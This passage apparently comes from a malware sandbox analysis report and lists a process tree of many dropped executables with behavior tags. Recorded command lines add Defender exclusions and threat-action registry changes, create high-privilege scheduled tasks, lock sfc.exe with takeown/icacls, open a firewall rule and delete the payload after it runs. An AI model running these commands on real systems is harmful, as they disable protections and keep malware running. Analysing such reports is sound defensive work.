- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:8636

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
"C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:8144

C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe"
4⤵
PID:6612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000047001\file300un.exe" -Force
5⤵
- Command and Scripting Interpreter: PowerShell
PID:7204

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
5⤵
PID:1976

C:\Users\Admin\Pictures\tgrLHFgdp2274Kduht6h6Vhl.exe
"C:\Users\Admin\Pictures\tgrLHFgdp2274Kduht6h6Vhl.exe"
6⤵
PID:1068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\tgrLHFgdp2274Kduht6h6Vhl.exe" -Force
7⤵
- Command and Scripting Interpreter: PowerShell
PID:5596

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
7⤵
PID:4296

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
7⤵
PID:8

C:\Users\Admin\Pictures\53qaydnK7y52dyXvUo253fzj.exe
"C:\Users\Admin\Pictures\53qaydnK7y52dyXvUo253fzj.exe" /s
6⤵
PID:5092

C:\Users\Admin\Pictures\FXeIJbN7TG1a5d70SzyM45MB.exe
"C:\Users\Admin\Pictures\FXeIJbN7TG1a5d70SzyM45MB.exe"
6⤵
PID:4144

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy Albany Albany.cmd & Albany.cmd & exit
7⤵
PID:1944

C:\Users\Admin\Pictures\jLUulBdiyG0sbwJsJML0AOrw.exe
"C:\Users\Admin\Pictures\jLUulBdiyG0sbwJsJML0AOrw.exe"
6⤵
PID:3220

C:\Users\Admin\Pictures\mC02A2hIIvrsoXOI0yBXJdrE.exe
"C:\Users\Admin\Pictures\mC02A2hIIvrsoXOI0yBXJdrE.exe"
6⤵
PID:6624

C:\Users\Admin\AppData\Local\Temp\7zSCC3.tmp\Install.exe
.\Install.exe
7⤵
PID:8512

C:\Users\Admin\AppData\Local\Temp\7zS18D9.tmp\Install.exe
.\Install.exe /yrVdidRYRgn "385118" /S
8⤵
PID:6356

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
9⤵
PID:5312

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
10⤵
PID:9140

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
11⤵
PID:5800

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
12⤵
PID:6476

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
10⤵
PID:6432

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
11⤵
PID:6964

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
12⤵
PID:6324

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
10⤵
PID:6416

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
11⤵
PID:8536

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
12⤵
PID:5620

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
10⤵
PID:1288

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
11⤵
PID:8216

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
12⤵
PID:9196

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
10⤵
PID:1104

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
11⤵
PID:4444

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
12⤵
- Command and Scripting Interpreter: PowerShell
PID:8548

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
13⤵
PID:5624

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
14⤵
PID:7680

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
9⤵
PID:8028

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
10⤵
PID:6368

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
11⤵
- Command and Scripting Interpreter: PowerShell
PID:4836

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
12⤵
PID:8540

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 16:50:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS18D9.tmp\Install.exe\" PP /wRMdidGDkz 385118 /S" /V1 /F
9⤵
- Creates scheduled task(s)
PID:7256

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"
9⤵
PID:5736

C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn btZaCbGShXZoJDfvCg
10⤵
PID:8072

\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn btZaCbGShXZoJDfvCg
11⤵
PID:6784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6356 -s 1028
9⤵
- Program crash
PID:7420

C:\Users\Admin\Pictures\guLj3XIIs50VtXUTtZeMKTVw.exe
"C:\Users\Admin\Pictures\guLj3XIIs50VtXUTtZeMKTVw.exe" /s
6⤵
PID:6380

C:\Users\Admin\Pictures\360TS_Setup.exe
"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
7⤵
PID:9672

C:\Program Files (x86)\1717260863_0\360TS_Setup.exe
"C:\Program Files (x86)\1717260863_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
8⤵
PID:9912

C:\Users\Admin\Pictures\aKf5tUfnFQxfuZlfNOmjaHDA.exe
"C:\Users\Admin\Pictures\aKf5tUfnFQxfuZlfNOmjaHDA.exe"
6⤵
PID:1356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\aKf5tUfnFQxfuZlfNOmjaHDA.exe" -Force
7⤵
- Command and Scripting Interpreter: PowerShell
PID:2400

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
7⤵
PID:8932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8932 -s 752
8⤵
- Program crash
PID:6112

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
7⤵
PID:760

C:\Users\Admin\Pictures\vhqxUDH9ZvNBTMpo55lQG06V.exe
"C:\Users\Admin\Pictures\vhqxUDH9ZvNBTMpo55lQG06V.exe"
6⤵
PID:1532

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy Albany Albany.cmd & Albany.cmd & exit
7⤵
PID:8640

C:\Users\Admin\Pictures\6i2gnj9f7cl0HBiyuBgtDWmq.exe
"C:\Users\Admin\Pictures\6i2gnj9f7cl0HBiyuBgtDWmq.exe"
6⤵
PID:6780

C:\Users\Admin\AppData\Local\Temp\7zSC07F.tmp\Install.exe
.\Install.exe
7⤵
PID:536

C:\Users\Admin\Pictures\veXzrokAbYK5LpP9GsxaO3UT.exe
"C:\Users\Admin\Pictures\veXzrokAbYK5LpP9GsxaO3UT.exe"
6⤵
PID:2516

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
5⤵
PID:7460

C:\Users\Admin\AppData\Local\Temp\a\33333.exe
"C:\Users\Admin\AppData\Local\Temp\a\33333.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3176

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:7104

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Checks computer location settings
PID:4356

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
4⤵
- Executes dropped EXE
PID:8748

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:4412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3176 -s 272
3⤵
- Program crash
PID:3584

C:\Users\Admin\AppData\Local\Temp\a\lenin.exe
"C:\Users\Admin\AppData\Local\Temp\a\lenin.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3268

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:8388

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:2620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3268 -s 1736
3⤵
- Program crash
PID:5276

C:\Users\Admin\AppData\Local\Temp\a\alex.exe
"C:\Users\Admin\AppData\Local\Temp\a\alex.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6860

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5756

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
4⤵
PID:6648

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
4⤵
PID:7188

C:\Users\Admin\AppData\Local\Temp\a\well.exe
"C:\Users\Admin\AppData\Local\Temp\a\well.exe"
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7436

C:\Users\Admin\AppData\Local\Temp\a\swizzzz.exe
"C:\Users\Admin\AppData\Local\Temp\a\swizzzz.exe"
2⤵
PID:7656

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:8228

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6240

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:8624

C:\Users\Admin\AppData\Local\Temp\a\sarra.exe
"C:\Users\Admin\AppData\Local\Temp\a\sarra.exe"
2⤵
PID:8280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8280 -s 1576
3⤵
- Program crash
PID:10120

C:\Users\Admin\AppData\Local\Temp\a\228.exe
"C:\Users\Admin\AppData\Local\Temp\a\228.exe"
2⤵
PID:6712

C:\Users\Admin\AppData\Local\Temp\a\fileosn.exe
"C:\Users\Admin\AppData\Local\Temp\a\fileosn.exe"
2⤵
PID:7300

C:\Users\Admin\AppData\Local\Temp\a\amers.exe
"C:\Users\Admin\AppData\Local\Temp\a\amers.exe"
2⤵
PID:5100

C:\Users\Admin\AppData\Local\Temp\a\IerLRtXpEcMnUjz.exe
"C:\Users\Admin\AppData\Local\Temp\a\IerLRtXpEcMnUjz.exe"
2⤵
PID:8612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\IerLRtXpEcMnUjz.exe"
3⤵
- Command and Scripting Interpreter: PowerShell
PID:5020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DzmQEVPXhX.exe"
3⤵
- Command and Scripting Interpreter: PowerShell
PID:6500

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DzmQEVPXhX" /XML "C:\Users\Admin\AppData\Local\Temp\tmpB2D.tmp"
3⤵
- Creates scheduled task(s)
PID:3932

C:\Users\Admin\AppData\Local\Temp\a\IerLRtXpEcMnUjz.exe
"C:\Users\Admin\AppData\Local\Temp\a\IerLRtXpEcMnUjz.exe"
3⤵
PID:7200

C:\Users\Admin\AppData\Local\Temp\a\IerLRtXpEcMnUjz.exe
"C:\Users\Admin\AppData\Local\Temp\a\IerLRtXpEcMnUjz.exe"
3⤵
PID:8820

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\IerLRtXpEcMnUjz.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
PID:6728

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'IerLRtXpEcMnUjz.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
PID:5436

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\cmd.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
PID:5708

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'cmd.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
PID:9992

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "cmd" /tr "C:\ProgramData\cmd.exe"
4⤵
- Creates scheduled task(s)
PID:8984

C:\Users\Admin\AppData\Local\Temp\a\gold.exe
"C:\Users\Admin\AppData\Local\Temp\a\gold.exe"
2⤵
PID:7276

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7276 -s 236
3⤵
- Program crash
PID:1432

C:\Users\Admin\AppData\Local\Temp\a\5.exe
"C:\Users\Admin\AppData\Local\Temp\a\5.exe"
2⤵
PID:7624

C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
"C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe"
2⤵
PID:1304

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe" /F
3⤵
- Creates scheduled task(s)
PID:7624

C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe
"C:\Users\Admin\AppData\Local\Temp\1000287001\360TS_Setup_Mini_WW.exe"
3⤵
PID:1948

C:\Users\Admin\AppData\Local\Temp\a\A.I_1003H.exe
"C:\Users\Admin\AppData\Local\Temp\a\A.I_1003H.exe"
2⤵
PID:6428

C:\Users\Admin\AppData\Local\Temp\RarSFX0\A.I.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\A.I.exe"
3⤵
PID:5712

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\A.I_Run.cmd" "
4⤵
PID:9400

C:\Windows\SysWOW64\sc.exe
sc stop PcaSvc
5⤵
- Launches sc.exe
PID:9156

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\Sysnative\sfc.exe
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:548

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\Sysnative\sfc.exe /t /deny everyone:f
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:9488

C:\Users\Admin\AppData\Local\Temp\a\s2.exe
"C:\Users\Admin\AppData\Local\Temp\a\s2.exe"
2⤵
PID:10176

C:\Users\Admin\AppData\Local\Temp\a\WinDisc.exe
"C:\Users\Admin\AppData\Local\Temp\a\WinDisc.exe"
2⤵
PID:3308

C:\Users\Admin\AppData\Local\Temp\a\WinDisc.exe
"C:\Users\Admin\AppData\Local\Temp\a\WinDisc.exe"
3⤵
PID:4556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "SYSTEMINFO | findstr "System Info""
4⤵
PID:9932

C:\Windows\SysWOW64\systeminfo.exe
SYSTEMINFO
5⤵
- Gathers system information
PID:2504

C:\Windows\SysWOW64\findstr.exe
findstr "System Info"
5⤵
PID:7520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "SYSTEMINFO | findstr "System Info""
4⤵
PID:6828

C:\Windows\SysWOW64\systeminfo.exe
SYSTEMINFO
5⤵
- Gathers system information
PID:6920

C:\Users\Admin\AppData\Local\Temp\a\setup%E8%87%AA%E6%9F%A5%E5%85%A5%E5%8F%A3.exe
"C:\Users\Admin\AppData\Local\Temp\a\setup%E8%87%AA%E6%9F%A5%E5%85%A5%E5%8F%A3.exe"
2⤵
PID:4536

C:\Users\Admin\AppData\Local\Temp\is-NCK45.tmp\setup%E8%87%AA%E6%9F%A5%E5%85%A5%E5%8F%A3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NCK45.tmp\setup%E8%87%AA%E6%9F%A5%E5%85%A5%E5%8F%A3.tmp" /SL5="$A03B6,2955638,832512,C:\Users\Admin\AppData\Local\Temp\a\setup%E8%87%AA%E6%9F%A5%E5%85%A5%E5%8F%A3.exe"
3⤵
PID:5860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\offdnee\auunfs.bat" "
4⤵
PID:2456

\??\c:\offdnee\jsbbv.exe
jsbbv.exe
5⤵
PID:6540

C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\jsbbv.txt
6⤵
- Opens file in notepad (likely ransom note)
PID:1096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6540 -s 2040
6⤵
- Program crash
PID:6940

C:\Users\Admin\AppData\Local\Temp\a\APSVR.exe
"C:\Users\Admin\AppData\Local\Temp\a\APSVR.exe"
2⤵
PID:7532

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\setup.msi"
3⤵
PID:4116

C:\Users\Admin\AppData\Local\Temp\a\payload.exe
"C:\Users\Admin\AppData\Local\Temp\a\payload.exe"
2⤵
PID:5936

C:\Users\Admin\AppData\Roaming\Z0BAZwxx\flfzba.exe
C:\Users\Admin\AppData\Roaming\Z0BAZwxx\flfzba.exe
3⤵
PID:1628

C:\Windows\SysWOW64\cmd.exe
/a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Z0BAZwxx\flfzba.exe"
4⤵
PID:6636

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Z0BAZwxx\flfzba.exe"
5⤵
- Modifies Windows Firewall
PID:9088

C:\Users\Admin\AppData\Roaming\Z0BAZwxx\flfzba.exe
"C:\Users\Admin\AppData\Roaming\Z0BAZwxx\flfzba.exe"
4⤵
PID:768

C:\Windows\SysWOW64\cmd.exe
/a /c ping 127.0.0.1 -n 3&del "C:\Users\Admin\AppData\Local\Temp\a\payload.exe"
3⤵
PID:9628

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
4⤵
- Runs ping.exe
PID:8628

C:\Users\Admin\AppData\Local\Temp\a\svhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\svhost.exe"
2⤵
PID:3080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\svhost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
PID:10092

C:\Users\Admin\AppData\Local\Temp\a\crypted_c360a5b7.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted_c360a5b7.exe"
2⤵
PID:9624

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6912

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6692

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:9360

C:\Users\Admin\AppData\Local\Temp\a\ZinTask.exe
"C:\Users\Admin\AppData\Local\Temp\a\ZinTask.exe"
2⤵
PID:4496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 232
3⤵
- Program crash
PID:4544

C:\Users\Admin\AppData\Local\Temp\a\64.exe
"C:\Users\Admin\AppData\Local\Temp\a\64.exe"
2⤵
PID:8840

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c color 0a
3⤵
PID:6976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c chcp 936
3⤵
PID:6584

C:\Windows\system32\chcp.com
chcp 936
4⤵
PID:8832

C:\Users\Admin\AppData\Local\Temp\a\lordga.exe
"C:\Users\Admin\AppData\Local\Temp\a\lordga.exe"
2⤵
PID:5740

C:\Users\Admin\AppData\Local\Temp\a\UpdateTool_858.exe
"C:\Users\Admin\AppData\Local\Temp\a\UpdateTool_858.exe"
2⤵
PID:10200

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1472

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 5948 -ip 5948
1⤵
PID:5240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7680 -ip 7680
1⤵
PID:6760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3176 -ip 3176
1⤵
PID:9104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1868 -ip 1868
1⤵
PID:7936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 8624 -ip 8624
1⤵
PID:5704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 7704 -ip 7704
1⤵
PID:8176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1868 -ip 1868
1⤵
PID:6984

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
